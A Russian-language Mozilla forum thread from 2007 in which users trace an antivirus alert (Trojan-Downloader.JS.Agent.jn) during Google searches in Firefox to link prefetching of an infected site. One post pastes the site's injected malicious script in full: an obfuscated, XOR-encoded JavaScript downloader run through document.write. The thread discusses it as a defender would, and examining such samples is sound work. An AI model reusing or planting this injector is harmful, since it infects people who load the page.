>Форум Mozilla Россия http://forum.mozilla-russia.org/index.php >Firefox http://forum.mozilla-russia.org/viewforum.php?id=4 >Customizegoogle, Firefox и Google - опасность заражения компа http://forum.mozilla-russia.org/viewtopic.php?id=17686 |
Wiccanmist > 24-06-2007 04:13:09 |
Я пользуюсь различными сервисами от Google и нашел, как раньше думал, замечательное расширение Customizegoogle Однако в последнее время при поиске в Google я стал замечать попытки открытия ссылок на неизвестные сайты (например запрос на авторизацию на различных форумах и ресурсах) а сегодня Касперский отловил попытку установки опасного ПО во время поиска, точнее Trojan-Downloader.JS.Agent.jn все это происходит при использовании этого расширения Встает вопрос, а безопасно ли это расширение? Как расширение, которое является потенциально опасным, попало на официальные серверы mozilla? Как тщательно проверяются дополнения к Огнелису? |
Wiccanmist > 24-06-2007 04:47:23 |
Хм, если попробовать искать по ссылке опасного сайта, в огнелисе осуществляется попытка установки вреданосного ПО, при аналогичных действиях в Ие такое не происходит это что, дыра лисы? Добавлено Вск 24 Июн 2007 05:06:48 : |
dvdianov > 24-06-2007 10:35:27 |
Wiccanmist |
Wiccanmist > 24-06-2007 11:52:11 |
По разному, например при запросе "вирджиния вулф" пытается соединиться с coolsoch.ru (только при включенном расширении). Если забить адрес этого сайта в поиск, то опять таки происходит попытка установки Trojan-Downloader.JS.Agent.jn Если набить этот же нэт адрес в гугл, но в Ие ничего не происходит, так же если попытаться искать это сайт в том же Огнелисе, но через другую поисковую систему. Так что такая вот зависимость - |
Баннер > 24-06-2007 12:08:18 |
Ничего удивительного, что каспер ругается. Выделить код Код:><script>document.write(unescape("%3Cscript%3Etry%20%7Bvar%20Egp%3D%27zzEzkEzpEzgEz8EztEzsEzYEzTEzGEznEzIEzxEzaEzDEz4EzlEzyEzWEzAEzOEzoEz3EzhEzKEzbEzwEzPEzHEzNEzrEz7EzfEzjEzJEzMEzcEzBEzREz9EzVEzXEzeEziEzUEzmEzFEzZEzSEzqEzLEz6EzdEz5EkzEkkEkpEkgEk8EktEksEkYEkTEkGEknEkIEkxEkaEkDEk4EklEkyEkWEkAEkOEkoEk3EkhEkKEkbEkwEkPEkH%27%2CkFS%3DString%28%27E%27%29%3Bvar%20lcE%3DArray%2828463%5E28611%2C14484%5E14391%2CuQl%28%27179%27%29%2CuQl%28%27162%27%29%2CuQl%28%27185%27%29%2C20673%5E20577%2CuQl%28%27164%27%29%2CuQl%28%27238%27%29%2C27079%5E26993%2C494%5E331%2CuQl%28%27190%27%29%2C5362%5E5197%2CuQl%28%27240%27%29%2C80%5E201%2C32556%5E32669%2CuQl%28%27161%27%29%2C15955%5E16043%2C11995%5E11875%2C19527%5E19695%2C31718%5E31613%2CuQl%28%27252%27%29%2CuQl%28%27152%27%29%2CuQl%28%27166%27%29%2CuQl%28%27156%27%29%2CuQl%28%27249%27%29%2CuQl%28%27171%27%29%2C22833%5E22959%2CuQl%28%27188%27%29%2CuQl%28%27149%27%29%2C2300%5E2065%2C31248%5E31397%2CuQl%28%27167%27%29%2CuQl%28%27148%27%29%2C20682%5E20513%2C23753%5E23607%2C17257%5E17389%2CuQl%28%27189%27%29%2C15856%5E15687%2CuQl%28%27251%27%29%2C31161%5E31057%2CuQl%28%27230%27%29%2CuQl%28%27228%27%29%2C1933%5E1901%2CuQl%28%27180%27%29%2C24576%5E24763%2C2531%5E2321%2CuQl%28%27151%27%29%2C20070%5E20219%2CuQl%28%27131%27%29%2CuQl%28%27173%27%29%2CuQl%28%27129%27%29%2C31100%5E31115%2CuQl%28%27225%27%29%2CuQl%28%27136%27%29%2CuQl%28%27150%27%29%2CuQl%28%27133%27%29%2CuQl%28%27128%27%29%2C25916%5E26051%2C21764%5E21915%2CuQl%28%27253%27%29%2CuQl%28%27234%27%29%2CuQl%28%27241%27%29%2C26510%5E26465%2C13557%5E13439%2C25370%5E25489%2CuQl%28%27142%27%29%2C8555%5E8641%2C13750%5E13663%2CuQl%28%27141%27%29%2CuQl%28%27140%27%29%2CuQl%28%27186%27%29%2C19528%5E19673%2C321%5E499%2C24827%5E24681%2CuQl%28%27227%27%29%2C446%5E279%2C31552%5E31699%2C32461%5E32279%2CuQl%28%27226%27%29%2C19152%5E18997%2C12474%5E12381%2CuQl%28%27134%27%29%2CuQl%28%27250%27%29%29%2CBUO%3Bvar%20zfl%2CkEQ%3Bvar%20gFr%3D%27zzzkzpzgz8ztzszYzTzGznzpzsz8zIznzxzazDz4zlzyzWzAzOzoz3zhzKzbzxz3zDzgzxzwzPzHzNznzrz7zxzfzDzszrzlzKzOzxzTzazwzNzxznzrz7zxzfzDzszrzlzKzjzxzTzazwzJzkzrzszMz8zczrzlzwzPzHzJzBzrzszMz8zczrzlzKzRz9zVzXzezezezezezKzjzxzizIzpzGzczrznzszJzpzIzIzUz8zrzxzNzxzyzWzAzRzmzNzmzRzrzkzpzDztzrzlzoz3zhzKzRzmzjzrzWztz8zgzrzkzNzmzRzTzazwzJzszIzFzZzMzSzszgz8znzBzlzKzjzxzqz3zDzgzxzZzLzMzNz6zkzdzTzIztzsz6zjz3zDzgzxzyz5kzzNz6zdz6zOzyzLz8zNz6zGztzizDzszrzdzJzpzPzDzkzkz8zpzszrzPzJzIzgzBz6zjz3zDzgzxzWkkkpzNz6kgzyzszczPkgz6zjz8zTzlzizIzpzGzczrznzszJzpzIzIzUz8zrzJz8znzizrzWk8zTzlzZzLzMzRz6zNz6zRzyz5kzzKzNzNktzdzKzbzxz3zDzgzxz8zUzyzNz6zyzszsztkskgkgz6zRzlzizIzpzGzczrznzszJzPzIzpzDzsz8zIznzJzyzIzkzszxkYzNzxz6z6kTz6z6kszDkGzfzlzKzKzRzizIzpzGzczrznzszJzPzIzpzDzsz8zIznzJzyzIzkzszJzgzrztzPzDzpzrzlkgknkIzDktkxzektkazJktkDkgzOz6zJz6zKzJzgzrztzPzDzpzrzlkgk4zJzRkgzOz6zJz6zKzRz6zJz6zRzDkGzfzlzKzRz6zJz6zRzyzLz8zRzWkkkpzjz3zDzgzxz4klzkzNzizIzpzGzczrznzszJzpzgzrzDzszrzHzPzrzczrznzszlz6z8zTzgzDzczrz6zKzjz4klzkzJzkzrzskyzszszgz8kWzGzszrzlz6zkzgzpz6zOz8zUzyzKzjz4klzkzJzTzgzDzczrkAzIzgzizrzgzNzezjzxz4klzkzJz7z8zizszyzNzXzjz4klzkzJzyzrz8zBzyzszNkOzjzszgkozxzbzxzizIzpzGzczrznzszJkWzIzikozJzDztztzrznzik3zyz8zPzizlz4klzkzKzjzazDz4zlzZzLzMzOzyz5kzzKzjzxzqzpzDzszpzyzlzrzKzbzxzizIzpzGzczrznzszJz7zgz8zszrzlz6zzzyzszczPzYzzkWzIzikozYzzkgkWzIzikozYzzkgzyzszczPzYz6zKzjzizIzpzGzczrznzszJkWzIzikozJzDztztzrznzik3zyz8zPzizlz4klzkzKzjzxzazDz4zlzZzLzMzOzyz5kzzKzjzxzqzxzqkhzTzGznzpzsz8zIznzxzDkGzfzlzKzbzxz3zDzgzxkykozFzNkKzXzjz3zDzgzxzazFk3zNzmzezdkKkOzXkbzVkwz9kazezDkWzpzizrzTzmzOkzzfzDzNzmzmzjzxzTzIzgzlkAzIkPzNzezjzxkAzIkPzxzzzxkykozFzjzxkAzIkPzRzRzKzxkzzfzDzRzNzxzazFk3zJzkzGkWzkzszgzlzZzDzszyzJzTzPzIzIzgzlzZzDzszyzJzgzDznzizIzczlzKkHzazFk3zJzPzrznzBzszyzKzOzdzOzdzKzjzxzgzrzszGzgznzxkzzfzDzjzxzqzzkgzkzpzgz8ztzszY%27%2CvEh%3D%27%27%3BEgp%3DEgp.split%28kFS%29%3Bfor%28BUO%3D0%3BBUO%3CgFr.length%3BBUO+%3D2%29%7BkEQ%3DgFr.substr%28BUO%2C2%29%3Bfor%28zfl%3D0%3Bzfl%3CEgp.length%3Bzfl++%29%7Bif%28Egp%5Bzfl%5D%3D%3DkEQ%29break%3B%7D%20vEh+%3DString.fromCharCode%28lcE%5Bzfl%5D%5E208%29%3B%7Dfunction%20uQl%28LXO%29%7Breturn%20parseInt%28LXO%29%7Ddocument.write%28vEh%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]--> |
Wiccanmist > 24-06-2007 14:00:22 |
И все таки что это может все означать? Дыру в фоксе? или сервисах google? Customizegoogle сам по себе не опасен (во всяком случае так терь думаю) он просто повышает возможность натолкнуться на эту проблему при поиске в гуле |
Modex > 24-06-2007 14:01:15 |
Может быть в настройках расширения (которое непосредственно к разработкам гугла не относится) есть какие-либо настройки подгрузки первой страницы из списка к примеру? Предпросмотр страниц к примеру может быть (я правда не помню что там расширение ещё может)... |
Wiccanmist > 24-06-2007 14:06:04 |
Есть просмотр фавиконов, но возможность установки вреданостного ПО есть и без использования расширения (например, берем адрес того сайта coolsoch.ru и вводим в поиск в Google, после ччего сразу всплывает предупреждение KIS при чем тока в Firefox) |
Modex > 24-06-2007 14:09:23 |
Хм... NoScript рулит |
Баннер > 24-06-2007 15:25:52 |
Ну это только если не используется какая-либо свежая дыра.
Может начали скрипты под fox ради прикола точить? |
ego > 24-06-2007 16:02:06 |
Wiccanmist |
Wiccanmist > 24-06-2007 16:14:15 |
ego заходишь на сайт http://www.google.ru/ в строке поиска набиваешь coolsoch.ru жмешь "Поиск в Google" и ... вот тебе и сообщение KIS ... |
ego > 24-06-2007 16:59:35 |
Я думаю, это из-за использования prefetch. Google ставит <link rel="prefetch" href="http://www.coolsoch.ru/"> - и Fx начинает подгружать страницу в фоне. Насколько я понял, Google включает prefetch для первого результата поиска. |
VeryGoodName > 04-07-2007 11:46:18 |
ego пишет
Если так, то проблемы с безопасностью видимо нет. Касперский проверяет все, что выкачивается из сети, независимо от того, кто это делает и почему. Если там эксплойт под ИЕ, а выкачивает ФФ -- на который этот эксплойт в принципе не действует, он все равно будет ругаться. Фаерфокс заранее выкачивает первую ссылку, чтобы потом быстро ее показать, на случай если вы ее потом кликнете (это называтеся prefetch), а Каспер находит там враждебный код, поскольку он там есть. Однако, во-первых, ФФ наверняка не будет интерпретировать этот код, так что даже если бы он срабатывал, опасности бы не было. Поскольку нет никакого смысла выполнять то, что загружено в режиме префетча. Во-вторых, как я уже написал, сообщ Касперского вовсе не означает, что данный код опасен в данной ситуации. Он проверят только то, что он опасен вообще. По всей видимости, это очередной эксплойт под ИЕ, который на ФФ не подействует, даже если вы зайдете на эту страницу. В общем, вывод у меня такой, что это ложная тревога. Чтобы проверить, что дело именно в этом, можно попробовать отключить префетч, потом посмотреть список результатов поиска -- сообщений антивируса быть не должно. Потом попытаться зайти на эту страницу. Тут антивирус должен заорать. Если так и будет, значит предположение ego правильное и бояться в данном случае нечего. |
VeryGoodName > 04-07-2007 14:10:58 |
Апдейт: на сайте coolsoch.ru этого кода уже нет, видимо админы уже убрали. Но вообще этой фигни много по интернету. Видимо, она умеет как-то заражать сайты. |
memini > 04-07-2007 14:26:51 |
Могу я узнать, какого черта лиса вообще что-то выкачивает по префетчу? Добавлено Срд 04 Июл 2007 14:29:04 : |